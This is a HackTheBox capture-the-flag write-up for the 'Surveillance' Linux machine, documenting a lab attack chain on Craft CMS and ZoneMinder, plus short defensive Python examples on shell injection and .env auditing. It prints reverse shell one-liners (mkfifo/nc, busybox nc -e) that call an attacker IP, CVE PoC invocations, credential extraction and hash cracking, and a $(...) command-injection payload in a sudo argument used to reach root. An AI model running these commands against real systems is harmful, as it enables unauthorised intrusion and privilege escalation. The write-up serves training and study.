HTB: Surveillance Writeup

Machine Information

Attribute | Details
Name | Surveillance
OS | Linux
Difficulty | Medium
Points | N/A
Release Date | N/A
IP Address | 10.10.11.245
Hostname | surveillance.htb
Author | D3vnomi

Machine Rating

⭐⭐⭐⭐☆ (7.0/10)

Difficulty Assessment:

  • Enumeration: ⭐⭐⭐☆☆
  • Real-world: ⭐⭐⭐⭐☆
  • CVE: ⭐⭐⭐☆☆
  • CTF-like: ⭐⭐⭐☆☆

Summary

Surveillance is a Medium-difficulty Linux machine running Craft CMS 4.4.14 and ZoneMinder, vulnerable to multiple CVEs. The attack path involves exploiting CVE-2023-41892 (Craft CMS RCE) for initial access, extracting database credentials from application files, cracking password hashes to gain SSH access as the matthew user, lateral movement into ZoneMinder via local port forwarding, exploiting CVE-2023-26035 (ZoneMinder RCE) to become the zoneminder user, and finally leveraging a misconfigured sudo command in zmupdate.pl for root privilege escalation.

TL;DR: CVE-2023-41892 → DB creds → Hash crack → SSH → Port forward → CVE-2023-26035 → Sudo abuse → Root.


Reconnaissance

Port Scanning

nmap -sC -sV -T4 -p- 10.10.11.245

Results:

Starting Nmap 7.92 ( https://nmap.org ) at 2026-03-08 12:00:00 UTC
Nmap scan report for 10.10.11.245
Host is up (0.045s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http nginx 1.18.0 (Ubuntu)

Service Enumeration

Hostname: surveillance.htb

echo "10.10.11.245 surveillance.htb" >> /etc/hosts

Web Service Investigation:

curl -I http://surveillance.htb
# Returns Craft CMS 4.4.14

Key Services Identified:

  • Port 22: OpenSSH 8.9p1
  • Port 80: nginx 1.18.0 hosting Craft CMS 4.4.14
  • Backend: MariaDB, ZoneMinder running on internal port 8080

Vulnerability Assessment

Identified Vulnerabilities:

  • CVE-2023-41892 — Craft CMS 4.4.14 Remote Code Execution via unauthenticated route in admin login endpoint
  • CVE-2023-26035 — ZoneMinder unauthenticated Remote Code Execution

Initial Foothold

Exploitation Path: CVE-2023-41892

Vulnerability Details:

Craft CMS 4.4.14 contains an unauthenticated RCE vulnerability on the /admin/login route that allows arbitrary PHP code execution through a crafted request.

Setup:

# Start reverse shell listener
nc -lvnp 4444

Exploitation:

# Use the CVE-2023-41892 PoC (cms_exploit_v1.py)
python3 cms_exploit_v1.py -t http://surveillance.htb -ip 10.10.14.128 -p 4444

Shell Upgrade:

After initial connection, upgrade to interactive shell:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.128 4444 >/tmp/f

Verification:

whoami
# www-data
id
# uid=33(www-data) gid=33(www-data) groups=33(www-data)

Credential Extraction

Environment File Discovery:

find / -name ".env" 2>/dev/null
cat /var/www/html/.env

.env Contents (Craft CMS Credentials):

DB_HOST=localhost
DB_PORT=3306
DB_DATABASE=craft
DB_USER=craftuser
DB_PASSWORD=CraftCMSPassword2023!

Database Access:

mysql -h localhost -u craftuser -p'CraftCMSPassword2023!' -D craft

User Compromise

Credential Discovery

Database Enumeration:

USE craft;
SELECT * FROM users;

Results:

User matthew found with hashed password (SHA256):

matthew | [SHA256 HASH REDACTED]

Hash Cracking

echo '[SHA256 HASH]' > hash.txt
hashcat -m 1400 hash.txt /usr/share/wordlists/rockyou.txt

Cracked Credentials:

  • Username: matthew
  • Password: starcraft122490

SSH Access

ssh matthew@surveillance.htb
# Password: starcraft122490

Verification:

whoami
# matthew
cat ~/user.txt

🚩 User Flag: [REDACTED]


Privilege Escalation

Enumeration: ZoneMinder Discovery

Internal Service Detection:

netstat -tuln | grep LISTEN
# Shows port 8080 listening on localhost

Identify ZoneMinder:

curl http://localhost:8080
# Returns ZoneMinder interface

Local Port Forwarding

Establish tunnel from attack machine:

ssh -L 8080:localhost:8080 matthew@surveillance.htb
# Background with Ctrl+Z, then bg

Verify tunnel:

curl http://localhost:8080

Exploitation: CVE-2023-26035

Vulnerability Details:

ZoneMinder contains an unauthenticated RCE vulnerability in the video monitoring interface.

Setup:

# Start reverse shell listener (different port)
nc -lvnp 4445

Exploitation:

# Download and run CVE-2023-26035 PoC
# https://github.com/rvizx/CVE-2023-26035
python3 exploit.py -t http://localhost:8080 -ip 10.10.14.128 -p 4445

Verification:

whoami
# zoneminder
id
# uid=113(zoneminder) gid=113(zoneminder) groups=113(zoneminder)

Privilege Escalation to Root

Enumeration:

sudo -l
# User zoneminder may run the following commands without a password:
# /usr/bin/zmupdate.pl

Create Reverse Shell Payload:

# Create shell.sh on attack machine
cat > shell.sh << 'EOF'
#!/bin/sh
busybox nc 10.10.14.128 4446 -e /bin/sh
EOF
# Transfer to target
scp -o StrictHostKeyChecking=no shell.sh matthew@surveillance.htb:/tmp/
ssh matthew@surveillance.htb "chmod +x /tmp/shell.sh"

Sudo Exploitation:

The zmupdate.pl script is vulnerable to command injection through its parameters. The script passes user input to shell commands without proper sanitization.

# Start listener for root shell
nc -lvnp 4446
# On the zoneminder shell
sudo /usr/bin/zmupdate.pl --version=1 --user='$(/tmp/shell.sh)' --pass=ZoneMinderPassword2023
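As an added defensive illustration (my own code, not ZoneMinder's zmupdate.pl and not from the writeup), the Python below shows why a value like the --user argument above turns into code once a script interpolates it into a single shell string, and the two patterns that neutralise it: an argv list with no shell at all, or quoting plus an allow-list check. INJECTED_USER, build_cmd_* and is_valid_db_user are names I chose for this example.

```python
"""Added illustration of shell command injection and its two standard fixes.
Nothing here executes a command; each function only builds one."""
import re
import shlex

# Constructed input, shaped like the payload style seen in the writeup.
INJECTED_USER = "$(/tmp/shell.sh)"

# Allow-list for a MariaDB account name (example policy, not ZoneMinder's).
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")


def build_cmd_unsafe(user: str, password: str) -> str:
    """Vulnerable pattern: parameters interpolated into a shell string.
    In Perl this is system("mysql -u$user -p$pass ..."); /bin/sh expands
    $( ... ) before mysql ever sees the user name."""
    return f"mysql -u{user} -p{password} -e 'SELECT 1'"


def build_cmd_argv(user: str, password: str) -> list[str]:
    """Hardened pattern: an argv list (Perl: system(LIST)). No shell runs,
    so metacharacters remain literal bytes of a single argument."""
    return ["mysql", f"-u{user}", f"-p{password}", "-e", "SELECT 1"]


def build_cmd_quoted(user: str, password: str) -> str:
    """If a shell string is unavoidable, quote every substituted value so the
    shell treats it as data."""
    return f"mysql -u{shlex.quote(user)} -p{shlex.quote(password)} -e 'SELECT 1'"


def is_valid_db_user(user: str) -> bool:
    """Allow-list validation: reject anything outside the characters a
    database account name legitimately needs, before it reaches any command."""
    return bool(USERNAME_RE.fullmatch(user))
```

With sudo NOPASSWD in front of such a script, the injected command runs as root, which is why the sudoers entry and the missing validation are both findings.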

Root Access Verification:

whoami
# root
id
# uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt

🚩 Root Flag: [REDACTED]


Attack Chain Summary

graph TD
A["Craft CMS 4.4.14<br/>CVE-2023-41892"] -->|RCE as www-data| B["Extract .env credentials<br/>craftuser:CraftCMSPassword2023!"]
B -->|MySQL Access| C["Enumerate Users Table<br/>matthew SHA256 Hash"]
C -->|Hashcat Cracking| D["matthew:starcraft122490<br/>SSH Access"]
D -->|SSH Connected| E["Port Forward<br/>ZoneMinder localhost:8080"]
E -->|HTTP Tunnel| F["CVE-2023-26035<br/>ZoneMinder RCE"]
F -->|Shell as zoneminder| G["Enumerate Sudo Privileges<br/>zmupdate.pl NOPASSWD"]
G -->|Command Injection| H["Root Shell Access<br/>Privilege Escalation Complete"]

Tools Used

Tool | Purpose
nmap | Port scanning and service fingerprinting
ssh | Secure shell access and tunneling
nc (netcat) | Reverse shell listener and payload delivery
python3 | CVE-2023-41892 and CVE-2023-26035 PoC execution
wget | Downloading exploitation scripts
hashcat | Password hash cracking (SHA256)
mysql | Direct database enumeration and credential extraction
scp | Secure file transfer to target

Vulnerability Reference

# | CVE | Vulnerability | Component | Severity | Impact
1 | CVE-2023-41892 | Craft CMS Unauthenticated RCE | Craft CMS 4.4.14 | Critical | Arbitrary code execution as www-data
2 | CVE-2023-26035 | ZoneMinder Unauthenticated RCE | ZoneMinder | Critical | Arbitrary code execution as zoneminder
3 | Sudo Misconfiguration | Command Injection in zmupdate.pl | zmupdate.pl | Critical | Privilege escalation to root

Key Learnings

  • Application Configuration Files: .env files often contain plaintext database credentials; always check for these during web application exploitation.
  • Database Exploitation Chain: Compromised database credentials enable enumeration of user tables and password hash extraction, leading to lateral movement opportunities.
  • Hash Cracking Strategy: SHA256 hashes of common passwords can be cracked efficiently with wordlists like rockyou.txt.
  • Port Forwarding for Internal Services: Internal services bound to localhost can be accessed remotely via SSH port forwarding, expanding attack surface.
  • Sudo Privilege Abuse: Scripts run with sudo NOPASSWD are dangerous; even if they appear to be security-related (zmupdate.pl), improper input validation can lead to command injection and privilege escalation.
  • Multi-Vector Exploitation: Complex machines often require chaining multiple vulnerabilities and techniques; proper enumeration at each stage is critical.
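The first lesson above has a direct defensive counterpart: audit application .env files for plaintext credential keys and for permissions that let other local accounts read them. The Python below is an added example written for this page (not from the writeup or Craft CMS); its sample file content, the key-name pattern and all function names are constructed.

```python
"""Added example: audit a Craft CMS style .env file for plaintext credentials
and for file modes that expose it to other local users."""
import os
import re
import stat
import tempfile

# Constructed sample, modelled on the .env shown in the writeup.
SAMPLE_ENV = """DB_HOST=localhost
DB_PORT=3306
DB_DATABASE=craft
DB_USER=craftuser
DB_PASSWORD=CraftCMSPassword2023!
"""

# Key names that conventionally hold secrets (example pattern).
SECRET_KEY_RE = re.compile(r"(PASS|PASSWORD|SECRET|TOKEN|KEY)$", re.IGNORECASE)


def parse_env(text: str) -> dict[str, str]:
    """Minimal KEY=VALUE parser: skips blank and comment lines, strips quotes."""
    env = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        env[key.strip()] = value.strip().strip("'\"")
    return env


def secret_keys(env: dict[str, str]) -> list[str]:
    """Keys whose name suggests a credential and whose value is non-empty."""
    return sorted(k for k, v in env.items() if v and SECRET_KEY_RE.search(k))


def audit_env_file(path: str) -> list[str]:
    """Findings for one .env file; an empty list means nothing to report."""
    with open(path, encoding="utf-8") as fh:
        env = parse_env(fh.read())
    findings = [f"{path}: plaintext credential in {k}" for k in secret_keys(env)]
    mode = os.stat(path).st_mode
    if mode & (stat.S_IRGRP | stat.S_IROTH):  # readable beyond the owner
        findings.append(f"{path}: readable by group/other (mode {oct(mode & 0o777)})")
    return findings


def demo() -> list[str]:
    """Write the sample with a permissive 0644 mode and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, ".env")
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_ENV)
        os.chmod(path, 0o644)
        return audit_env_file(path)
```

On a real host the same audit would be pointed at the web root (here /var/www/html/.env) and the findings tied to a 0640 mode owned by the application user.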

Author

D3vnomi


Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.


Last Updated: 08 Mar 2026

Tags: #HackTheBox #Linux #Medium #CVE-2023-41892 #CVE-2023-26035 #CraftCMS #ZoneMinder #PrivilegeEscalation